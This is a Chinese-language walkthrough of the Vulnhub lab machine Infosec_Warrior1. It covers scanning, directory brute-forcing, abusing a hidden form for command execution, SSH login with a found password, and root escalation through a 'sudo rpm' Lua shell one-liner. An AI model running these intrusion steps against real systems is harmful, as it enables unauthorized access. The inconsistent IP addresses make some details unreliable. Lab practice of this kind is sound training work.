Vulnhub靶机Infosec_Warrior1渗透

信息收集

主机发现

arp-scan -l
1

端口扫描

nmap -A -p- 192.168.160.39
1

目录爆破

dirsearch -u http://192.168.160.39
1

命令解释：

• dirsearch：是运行的工具的名称。

• -u http://192.168.60.39：指定要执行目录枚举的目标 URL。确保包含http://前缀。

• -i 200：此选项指示dirsearch仅显示返回 HTTP 状态代码 的目录200，这通常表示该目录存在并且可以访问。

  • 补充： -e php,html：此选项指定在目录枚举期间要查找的文件扩展名。

访问80端口，只能看出是Apache站点，没有别的

访问一下sitemap.xml

访问192.168.80.145/index.htnl，也没啥有用的，只有一张gif格式的动态图

查看页面源代码，发现隐藏的一个form表单,可以删除hidden='True'，回车！

因为靶机是在Centos系统上，所以在输入框中输入ls，没有得到正常的回显

把from表单换成post请求

再次在 输入框中输入ls，成功有了 回显

查看cmd.php，在表单中输入cat cmd.php

使用ssh远程连接 ssh isw0@192.168.160.39 密码：123456789blabla

如果ssh isw0@192.168.80.145连接时回应的是：Unable to negotiate with 192.168.160.39 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss ,可以使用：

ssh -oHostKeyAlgorithms=+ssh-rsa isw0@192.168.160.39
1

命令解析：

ssh: SSH命令，用于远程登录到其他计算机。
-o: 选项参数的前缀，用于指定一些特定的配置选项。
HostKeyAlgorithms=+ssh-rsa: 这是一个指定主机密钥算法的配置选项。+ssh-rsa表示允许使用RSA算法进行主机认证。主机密钥是用于验证远程主机身份的一种机制。
isw0@192.168.188.191: 用户名和目标主机的IP地址。isw0是用户名。

提权

连接成功后，sudo -l查看有哪些能以root身份执行的命令

去这个网站上找提权命令：https://gtfobins.github.io/

只能找到rpm命令字的提权方式

输入命令：

sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
1

提权成功：